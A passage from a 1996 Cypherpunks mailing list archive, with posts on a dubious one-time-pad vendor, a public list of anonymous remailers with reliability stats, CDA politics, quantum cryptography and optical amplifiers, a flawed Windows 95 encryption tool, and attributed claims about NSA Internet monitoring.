the technology"; at least the POTP people gave some names.

[...]
>          A fully
>          operational integrated multi-user system costs approximately
>          $140.00 per user, ready to load and go, with thousands, or
>          millions of Nvelopes and Nvelopeners. IPG also offers full
>          turnkey leases at $15.00 per user, per network, per
>          month, which includes all software, upgrades, administration,
>          and unlimited Nvelopes and Nvelopeners.
>
>          As a reference to its unbreakability, we refer you to an
>          article by Paul Leyland on Internet at:
> 
>              http://dcs.ex.ac.uk/~aba/otp.html

Clearly they (claim to) offer some sort of system using One Time Pads.
Notice the price quote of "$15.00 per user, per network, per month" including
"unlimited Nvelopes and Nvelopeners". I suspect this means that they're
basically selling chunks of (pseudo- ?)random data for as much as $15/person 
each month !  I guess it's nice work if you can get it. At that price, one
would hope that they're at least generating truly random bits from a hardware
source. But their skimpy details on their proprietary processes don't
inspire confidence....

>          For more information visit our Web Site at:
> 
>              http://www.netprivacy.com/ipg

In case you didn't get enough hyperbole from the press release, they have
extra helpings on the Web. This site has numerous pages containing precious
little real information. I found a few tidbits in unlikely places, though:

In http://www.netprivacy.com/ipg/mlmplan.html, which incidentally promises
that they "can help you to make some big bucks through the PCX Nvelopes
Multi - Level - Marketing Plan", it says:

> With our manufacturing process it is relatively easy for us
> to manufacture a ready to go system, for 25 users, or for
> 2,500 users.  All the user has to do is to prepare a
> DIR.LST, a Directory Listing of the users. We use that as
> the template and manufacture the system. 

This is actually a little scary. According to one of their other web pages, 
the DIR.LST file is a numbered list of user names and email addresses. So it
appears that a customer hands over a list of names and addresses, and IPG
assigns a set of one-time pads (or something) to each pair of users on the 
list. (Holy combinatorial explosion.) And now IPG knows the one-time pads that
will be used between any pair of email addresses on the list it has !  
The EES is starting to look attractive by comparison. 

> It becomes a load
> and go installation at each of the user sites. 

Gee, why are we all so worried about key management ?  It's just a load and
go installation at each of the user sites !  ;)

> We will even prepare, or help prepare, the DIR.LST for users.
>
> While we have the software and manufacturing facility to do
> that quickly, it is not easily transportable, to say the
> least, and certain aspects of it, we consider highly proprietary.

"not easily transportable, to say the least" ???  
Any ideas to what this might refer ?

OK, I saved (IMHO) the best for last. I suppose this could be taken as a claim
about their proprietary, immobile RNG methods:
(from http://www.netprivacy.com/ipg/comp.html)

>         How do we Achieve such High Standards?
>                  First Class Quality Control!
>
> We achieve unusually high standards of excellence because
> of the manufacturing process. Over 30%, sometimes as high as 
> 50% or more of our Nvelopes, Nvelopeners, are discarded 
> because they cannot meet our rigid standards. Also our 
> Nvelopes and Nvelopeners are subjected to a battery of 
> performance tests to insure that when used, they will meet the 
> high standards that you would expect.

<sigh> It's a jungle out there....

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 20 Feb 1996 00:42:45 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199602191450.GAA00933@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 19 Feb 96 6:46:32 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           #-###-**#*#+     4:52  99.99%
lead     mix@zifi.genetics.utah.edu            +++++++    40:29  99.97%
treehole remailer@mockingbird.alias.net        ++--+++  1:38:55  99.95%
nymrod   nymrod@nym.alias.net             **#* **+--+*    16:15  99.89%
c2       remail@c2.org                    +*** +****++    15:58  99.84%
gondolin mix@remail.gondolin.org          -__.--------  7:43:33  99.83%
gondonym alias@nym.gondolin.org           -__--------   7:15:55  99.81%
portal   hfinney@shell.portal.com         #*###-## ###     2:07  99.76%
flame    remailer@flame.alias.net         ++++ ++++++     54:43  99.72%
extropia remail@extropia.wimsey.com       -._.--.----  12:10:04  99.65%
vishnu   mixmaster@vishnu.alias.net       -*** ------   1:12:38  99.60%
mix      mixmaster@remail.obscura.com     ..-- -+-+--   2:32:14  99.56%
ecafe    cpunk@remail.ecafe.org           *### +#*###*     1:01  99.47%
alpha    alias@alpha.c2.org               ***  -+* ++*    46:19  99.34%
hacktic  remailer@utopia.hacktic.nl       **** +******     7:46  98.96%
replay   remailer@replay.com              +*** +*+****     5:47  98.41%
shinobi  remailer@shinobi.alias.net        ##* *.-++**  1:29:59  97.16%
penet    anon@anon.penet.fi                . **------  18:48:16  90.53%
rahul    homer@rahul.net                  ***#*+#+####     1:26  99.94%
tjava    remailer@tjava.com                      # -*#    41:23  80.93%
pamphlet pamphlet@idiom.com               ++++ ++         42:17  42.14%
ford     remailer@bi-node.zerberus.de                   4:33:06   6.65%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 19 Feb 1996 21:30:39 +0800
To: cypherpunks@toad.com
Subject: Re: Req. for soundbites
Message-ID: <199602191257.HAA09741@pipe12.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 18, 1996 19:27:04, 'frantz@netcom.com (Bill Frantz)' wrote: 
 
 
>>A local TV station has asked me for an interview, after I sent a graphic 
>>of a mono-digital hand gesture with the phrase "censor this!" to the
Prez, 
>>Veep, and the area congresscritters (cc'd to 2 TV stations and a radio 
>>station), accompanied by a 'confession' and demand for swift prosecution.

>> 
>>Anyone got any nifty sound bites I can try to toss in? 
> 
 
I do not think that sound bites are the way to deal with these complex
issues. 
 
"Sound bites," (a.k.a. bumper stickers, advertising jingles, or more
accurately "magical thinking") contribute to the problem where
emotionally-charged issues are able to bypass the critical facilities. So
many of the attacks on crypto and the net are based exactly on sound bites
around the "Four Horsemen" coupled with magical incantations on simple ways
to defeat the problem. 
 
One does not fight magic with magic but with science; one does not fight
bad hysteria with good hysteria but with adult thinking. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 19 Feb 1996 21:53:47 +0800
To: cypherpunks@toad.com
Subject: Should *WE* Sue Under CDA
Message-ID: <199602191314.IAA10758@pipe12.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 18, 1996 22:15:00, '"E. ALLEN SMITH"
<EALLENSMITH@ocelot.Rutgers.EDU>' wrote: 
 
 
>From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 17-FEB-1996 18:07:51.71 
> 
>>A lawsuit against the atheist would not be effective and could result in 
>>a countersuit for abuse of process. 
> 
>	Huh? You seem to have misinterpreted what I said. The atheist, who has 
>a child that reads the net, sues a Christian Fundamentalist organization
(say, 
>one of the Southern Baptist seminaries) for having a copy of the Bible -
which 
>contains material that is among the "seven dirty words" or whatever -
online, 
>where the child can read it. The CDA essentially says that a child reading

>indecent materials is doing harm to the child (a nice bit of nonsense),
which 
>gives the government the (undeserved) power to regulate such interactions.

>A countersuit will be somewhat difficult, since the organization in
question 
>(the one with the Bible online) is breaking the law; while there have been

>burglar suing because of broken leg cases, I believe that such are
generally 
>thrown out - possibly due to laws on the subject. 
>	Now, the jury won't find the seminary or whoever liable... but it would 
>create some publicity and tie the sued organization up for a while. It's 
>something that I'd encourage an atheist organization to sponsor. 
>	-Allen 
> 
 
On a personal and emotional level I *love* the idea of watching a group of
pro-CDA fundie christers having to sweat in court explaining how their
support for things like incest and murder are protected under the First
Amendment but other people's speech is not. 
 
But on a logical level, should we use (or advocate) the court system under
CDA-related topics. 
 
I think not. 
 
Allen's post has great emotional appeal, but it creates at least one
danger. 
 
The first is the hypocrisy involved in advocating something with which we
disagree, like asking the courts to support CDA and use CDA to punish those
we don't like. 
 
The second is creating an Orwellian doublethink in politics where we first
advocate something, like useing the courts. Then, when challenged (about
hypocrisy or anything else) turn around and state that we really did not
adovate what we so clearly did advocate or that we did not "mean" what we
so clearly said. 
 
Ultimately, we reinforce a form of political behavior where nobody is
responsible for their political behavior and nobody expects to be held
accountable for it. 
 
Witness the behavior of people like Rep. Shroeder who voted for CDA etc.
including the anti-abortion aspects, but does not want this to count among
the pro-choice crowd because she didn't "really" vote for CDA etc. to get
it to limit abortions. 
 
--tallpaul 
"Encryption? It is a Satanic drug thing. You wouldn't understand."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Feb 1996 21:55:37 +0800
To: cypherpunks@toad.com
Subject: NET_run
Message-ID: <199602191315.IAA19551@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-19-96. NYT:

   "In this new game, you'll never play with a full deck."

      Sometime next month a game will be played on the
      Internet, challenging surfers to leap between sites,
      solving puzzles and cracking codes that will give them
      access to secret data hidden behind firewalls and
      software barriers. The new game is Netrunner, set in the
      "dark techno-future" in which "ruthless corporations
      scheme to accomplish secret agendas as they build
      elaborate fortresses of data." In opposition to such
      plots, "anarchistic netrunners hack the system,
      infiltrating data forts to liberate information." It was
      created by Richard Garfield, who applied his doctoral
      training in combinatorial mathematics -- a field that
      studies the interaction of objects in complex systems.


   " 'Magic' Casts a Spell on Players."

      Magic was invented by Richard Garfield, who revels in
      his shoelessness. "I like to wear socks or slippers
      indoors," he said, padding around the Puck Building in
      thick. off-white socks. Developing the game took Mr.
      Garfield, who has a doctorate in combinational
      mathematics, all of a week.


   NET_run






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 19 Feb 1996 21:59:04 +0800
To: Andy Brown <cypherpunks@toad.com
Subject: Re: Windows 95 encryption shell extension
Message-ID: <2.2.32.19960219132610.00b67238@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 AM 2/19/96 +0000, Andy Brown wrote:
>http://www.fim.uni-linz.ac.at/win32/codedrag/codedrag.htm
>
>Haven't tried it myself since I don't use Windows 95, just thought
>I'd report what I saw.
>
>
>- Andy
>
>

"CodedDrag encrypts your personal data using the highly safe DES-code
algorithm."

I'll wait.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 19 Feb 1996 22:21:26 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous remailers are a virus spreading online! (Replies)
Message-ID: <v02120d1ead4e2130ac45@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>From: "Prof. L. P. Levine" <levine@blatz.cs.uwm.edu>

>My most serious question about anonymous remailers is this:  How can we
>be sure that the operator of such a remailer is not a federal or other
>governmental agent?

*Prove* to me I'm *not* a martian...

Don't you love the use of simple informal fallacies in supposedly logical
argument by supposedly rigorous scientists?

ObCrypto:

A: By using chained encryption, of course!

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rsc.anu.edu.au>
Date: Mon, 19 Feb 1996 06:50:53 +0800
To: cypherpunks@toad.com
Subject: Re: Science News - article on Quantum Crypto
Message-ID: <9602182222.AA17134@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Bob writes:
> 
> > Does anyone know if the new in-line optical amplifiers (not switches!) have
> > any effect on quantum crypto messages?
> 
> Yes, any active devices in your communications path would be unable to
> function without making some kind of classical measurement on the
> photons involved (e.g. measuring phase relative to a definite test
> angle, if phase is what's being modulated), thereby collapsing the
> wavefunction and spoiling any special properties afforded by being
> able to send photons down the line without "looking at them."  Optical
> repeaters have to pass your signal through an intermediate electronic
> stage anyway, since we have no purely optical valve/transistor
> equivalents (bosons don't interact with each other at all).

I am not sure this is correct. In-line optical amplifiers work by
stimulated emission like a laser rod. There is no intermediate
electronic stage. The amplifier is a section of fibre that is doped
with a rare earth element. The rare earth atoms are boosted into a metastable
high energy state using a power source around the fibre. Passing signals
(photons) stimulate the decays of the metastable states releasing more
photons and boosting the signal. I am not sure what the effect of this on the
polarisation characteristics of the signal is but my *hunch* is that the
polarisation characteristics would be preserved in the amplified signal.

Sherry

ps Any laser physicists in the house?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Mon, 19 Feb 1996 17:52:19 +0800
To: cypherpunks@toad.com
Subject: Windows 95 encryption shell extension
Message-ID: <312843A2.5D7C@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


http://www.fim.uni-linz.ac.at/win32/codedrag/codedrag.htm

Haven't tried it myself since I don't use Windows 95, just thought
I'd report what I saw.


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Tue, 20 Feb 1996 00:50:43 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: RE: Windows 95 encryption shell extension
Message-ID: <01BAFEAE.63BB64E0@loki>
MIME-Version: 1.0
Content-Type: text/plain


On Monday, February 19, 1996 4:32 AM, Andy Brown[SMTP:a.brown@nexor.co.uk] 
wrote:
>http://www.fim.uni-linz.ac.at/win32/codedrag/codedrag.htm
>
>Haven't tried it myself since I don't use Windows 95, just thought
>I'd report what I saw.
>
>
>- Andy
>

I downloaded this, AND installed it.  It displays your password right on 
the screen!!!  No *s, no blind typing.  Anyone looking over ytour shoulder 
can see what you type as your passphrase!  Come on.




----------
Brian Gorka
Key fingerprint =  ED 7D 78 7E 95 E8 05 01  27 01 A1 74 FA 4B 86 53 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Tue, 20 Feb 1996 09:12:32 +0800
To: jya@pipeline.com
Subject: Re: NET_run
In-Reply-To: <199602191315.IAA19551@pipe1.nyc.pipeline.com>
Message-ID: <7eLKx8m9LMaA085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199602191315.IAA19551@pipe1.nyc.pipeline.com>,
John Young <jya@pipeline.com> wrote:
>    2-19-96. NYT:
> 
>    "In this new game, you'll never play with a full deck."
> 
>       Sometime next month a game will be played on the
>       Internet, challenging surfers to leap between sites,
>       solving puzzles and cracking codes that will give them
>       access to secret data hidden behind firewalls and
>       software barriers. The new game is Netrunner, set in the
>       "dark techno-future" in which "ruthless corporations
>       scheme to accomplish secret agendas as they build
>       elaborate fortresses of data." In opposition to such
>       plots, "anarchistic netrunners hack the system,
>       infiltrating data forts to liberate information." It was
>       created by Richard Garfield, who applied his doctoral
>       training in combinatorial mathematics -- a field that
>       studies the interaction of objects in complex systems.

"Created by Richard Garfield??!!  Not bloody likely!

Netrunner is Wizards of the Coast's licensed adaptation of an existing
paper-and-dice roleplaying game, Cyberpunk(TM), created by Mike Pondsmith
and published by R. Talsorian Games.  The game was inspired by the
cyberpunk literary movement in general and the writing of Walter Jon
Williams (author of HARDWIRED) in particular.  (RTG's Cyberpunk(TM) game
should not be confused with Steve Jackson Games' GURPS Cyberpunk module
for Jackson's GURPS role-playing system, which was published later.)

"What the hell does this have to do with cryp%*##~~~
NO CARRIER
OK 

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMSi6X+VevBgtmhnpAQFW2wMAl3fUfG2PA+8Zh5x2dek5JGFS2Lzkpk4G
RGDweUo4PHPZy+U9HiG54LQ1+d8zI2KVirb67e0EE1hYHyMWi8Is9yZGtTgmo3hl
aTl8fN/CwbU4hXzM1OUDFHT1rpYjYviz
=B8TO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Tue, 20 Feb 1996 00:30:26 +0800
To: cypherpunks@toad.com
Subject: Re: Piracy Bests ITAR
Message-ID: <199602191507.KAA01812@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bruce Murphy wrote:

> > Has nothing to do with socialism... even works nice in a capitalist
> > as in the case where people try the software, decide they like it,
> > and then buy it latter when they can afford it. Sidekick and WordStar
> > became popular because of this "borrowing".  MS-DOS probably would > 
> be so widespread if it weren't pirated.
> 
> Uh huh? And you are saying that there were *heaps* of computers out
> there which could run MS-DOS which didn't come with it? And how much
> more would those companies have made had the products been *forced* to
> be sold rather than pirated.

The point of the original article was that those products probably would 
*not* have been sold.  What life would be like in other circumstances is
hard to consider... and rather moot (a friend of mine has an expression
for describing hypotheticals... "What is my grandfather had four arms?").

FSF/GNU and projects like FreeDOS, if they were several years earlier, 
would have made things quite interesting....

A point NOT in the orig. article but hinted at in the subject, though: if 
people cannot *buy* the software because of regs like ITAR, they'll steal 
it.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSiSGioZzwIn1bdtAQHIzwF+NiBHyvvJRviXZv91iqEnMKc0LQWGok+z
m8TiKOspP7wAZgGNmeRXWFXwrt2BV7sO
=LEUO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 20 Feb 1996 03:45:23 +0800
To: cypherpunks@toad.com
Subject: NSA net trolling
Message-ID: <199602191852.KAA06662@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 

Forwarded from alt.politics.datahighway, sorry I didn't
get the Message-ID when it was fowarded to me.

This is possibly old news to some, but I think it needs
to be spread widely.

 
> Article 1706 of alt.politics.datahighway:
> Date: Tue, 16 Jan 1996
> Subject: NSA SHORTCIRCUITING FUTURE CRYPTO CAPABILITIES
>
> from Global Net News
> ===
> [Want to know the easiest way... Puzzle Palace coauthor Wayne
> Madsen, in an article written for the June 1995 issue of Computer
> Fraud & Security Bulletin (Elsevier Advanced Technology Publications),
> wrote that "according to well-placed sources within the Federal
> Government and the Internet service provider industry, the National
> Security Agency (NSA) is actively sniffing several key Internet router
> and gateway hosts."
>
> Madsen says the NSA concentrates its surveillance on destination and
> origination hosts, as well as "sniffing" for specific key words and
> phrases.  He claims his sources have confirmed that the NSA has
> contracted with an unnamed private company to develop the software
> needed to capture Internet data of interest to the agency.
>
> According to Madsen, the NSA monitors traffic primarily at two Internet
> routers controlled by the National Aeronautics and Space Administration
> (NASA), one in College Park, MD (dubbed "Fix East") and another at NASA
> Ames Research Center in Sunnyvale, CA ("Fix West").
>
> Other NSA Internet sniffers, he said, operate at busy routers knows as
> Mae East (an East Coast hub), Mae West (a West Coast hub), CIX
> (reportedly based in San Jose), and SWAB (a northern Virginia router
> operated by Bell Atlantic).
>
> Madsen says the NSA may also be monitoring traffic at network access
> points, the large Internet gateways operated by regional and
> long-distance service providers. The NAPs allegedly under surveillance
> are in Pennsauken, NJ (operated by Sprint), Chicago (run by AmeriTech
> and Bell Communications Research), and San Francisco (Pacific Bell).
>
>    [Quote]
>    "Madsen claims the NSA has deals with Microsoft, Lotus, and Netscape
> to prevent anonymous email."
>    [quote]
>
> "One senior Federal Government source has reported that NSA has been
> particularly successful in convincing key members of the US software
> industry to cooperate with it in producing software that makes Internet
> messages easier for NSA to intercept, and if they are encrypted, to
> decode," Madsen wrote. "A knowledgeable government source claims that
> the NSA has concluded agreements with Microsoft, Lotus and Netscape to
> permit the introduction of the means to prevent the anonymity of
> Internet electronic mail, the use of cryptographic key-escrow, as well
> as software industry acceptance of the NSA-developed Digital Signature
> Standard (DSS)."
>
> Is the NSA really snooping on the Net? And if they are, would that
> violate the agency's charter, which specifically prohibits it from
> spying within the US?
>
> "Well, Net traffic is routed from God knows where to God knows where
> around the world," says George Washington University Professor Lance
> Hoffman, a professor of Communications and Telecommunications Systems
> Policy at George Washington University. "So if the NSA is doing this,
> they could say they are not violating their charter not to spy in the
> US. That's the thing. Intelligent routers send stuff any which way."
> 
> 
> 


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jah@alien.bt.co.uk
Date: Mon, 19 Feb 1996 19:35:34 +0800
To: cypherpunks@toad.com
Subject: Re: Science News - article on Quantum Crypto
Message-ID: <9526.199602191103@orb.alien.bt.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I am not sure this is correct. In-line optical amplifiers work by
> stimulated emission like a laser rod. There is no intermediate
> electronic stage. The amplifier is a section of fibre that is doped
> with a rare earth element. The rare earth atoms are boosted into a 
metastable
> high energy state using a power source around the fibre. Passing signals
> (photons) stimulate the decays of the metastable states releasing more
> photons and boosting the signal. I am not sure what the effect of this on 
the
> polarisation characteristics of the signal is but my *hunch* is that the
> polarisation characteristics would be preserved in the amplified signal.
> 
> Sherry
> 
> ps Any laser physicists in the house?

Dr. Simon Phoenix (my resident quantum crypto guru) says no, you can't
use em - you have to build secure repeaters. Simon has been doing this
sort of thing in the Lab for years. He's simon@alien.bt.co.uk if you want
to probe him gently.

/.J

BTW: You can build  an Erbium doped amp that is 'transparent' to your
secure channel.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 20 Feb 1996 03:57:23 +0800
To: cypherpunks@toad.com
Subject: Re: Req. for soundbites
Message-ID: <199602191900.LAA20595@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:57 AM 2/19/96 -0500, tallpaul wrote:
>On Feb 18, 1996 19:27:04, 'frantz@netcom.com (Bill Frantz)' wrote: 
> 
> 
>>>A local TV station has asked me for an interview, after I sent a graphic 
>>>of a mono-digital hand gesture with the phrase "censor this!" to the
>Prez, 
>>>Veep, and the area congresscritters (cc'd to 2 TV stations and a radio 
>>>station), accompanied by a 'confession' and demand for swift prosecution.
>
>>> 
>>>Anyone got any nifty sound bites I can try to toss in? 
>> 
For the record, that is not my statement, but one I was replying to.  No
offense, I think I may have made the same kind of mistake.

> 
>I do not think that sound bites are the way to deal with these complex
>issues. 

Tallpaul is right when he says that one SHOULD not deal with complex issues
through sound bites.  However, the mathematical model for this part of
politics is Prisoner's Dilemma.  (BTW It is also the model for negative
advertising.)  When your opponent goes to sound bites, you also must, or
you will lose.

The CDA fans have been using sound bites such as, "It will protect our
children from netporn."  and, "The net is a sea of pornography."  Lost jobs
and dead teenagers are the strongest images I can present on our side and
still feel look at myself in the mirror in the mornings.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 04:28:28 +0800
To: cypherpunks@toad.com
Subject: Remailers not heard from; info?
Message-ID: <2.2.32.19960219191757.006d763c@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm curious if anyone knows anything about the status of the following type
I remailers.

NOT HEARD FROM IN MY JANUARY OR FEBRUARY TESTS

amnesia@chardos.connix.com

NOT HEARD FROM IN MY FEBRUARY TESTS

pamphlet@idiom.com
remail@c2.org
remailer@bi-node.zerberus.de
robo@c2.org

And as long as I'm asking questions :-), I see that some remailers
(hfinney@shell.portal.com, hal@alumni.caltech.edu, homer@rahul.net) preserve
subject lines while others do not. Is this a readily settable option? If so,
I'd like to commend it to other remailer operators. If not, I'd be
interested in getting some sense of how difficult a hack it is.


-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Tue, 20 Feb 1996 06:56:55 +0800
To: ethridge@Onramp.NET
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
In-Reply-To: <v02140b00ad4978ac0d4a@[199.1.11.167]>
Message-ID: <9602191718.AA11463@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



>Given that the world of telephony is moving towards Local Number Portability,
>isn't it inevitable that the internet will be expected to provide the
>equivalent functionality?

You have this today in the form of symbolic addresses mapped to an
IP number via DNS (domain name service).

Under IPng, all this becomes easier to manage in the long run, but
